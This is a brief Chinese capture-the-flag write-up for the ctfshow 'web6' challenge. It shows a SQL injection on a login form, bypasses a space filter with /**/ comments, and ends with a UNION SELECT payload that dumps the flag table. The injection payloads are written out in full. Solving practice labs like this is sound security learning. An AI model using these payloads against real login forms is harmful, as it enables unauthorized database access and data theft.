ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
询问QQ:4877392781 小时前
混凝土细观压缩损伤模型ABAQUS,适合刚接触ABAQUS软件的初学者学习,包括模型文件与讲解视频
web安全
安全系统学习1 小时前
网络安全漏洞之React 框架分析
数据库·安全·web安全·网络安全
网安老伯2 小时前
计算机网络:网络安全(网络安全概述)
开发语言·数据库·python·计算机网络·web安全·网络安全·php
Xudde.11 小时前
friendly2靶机渗透
笔记·学习·安全·web安全·php
拾柒SHY14 小时前
XSS-Labs靶场通关
前端·web安全·xss
眠晚晚14 小时前
漏洞发现笔记分享
笔记·web安全·网络安全
Z3r4y17 小时前
【代码审计】JeecgBoot-3.5.0 四处安全问题分析
java·web安全·代码审计·jeecg-boot
GZ_TOGOGO17 小时前
网络安全认证考取证书有哪些?
安全·web安全·网络安全·cisp
it运维技术圈19 小时前
印度电信部门发布强制指令:即时通讯应用需绑定活跃 SIM 卡,实施六小时会话登出
网络·安全·web安全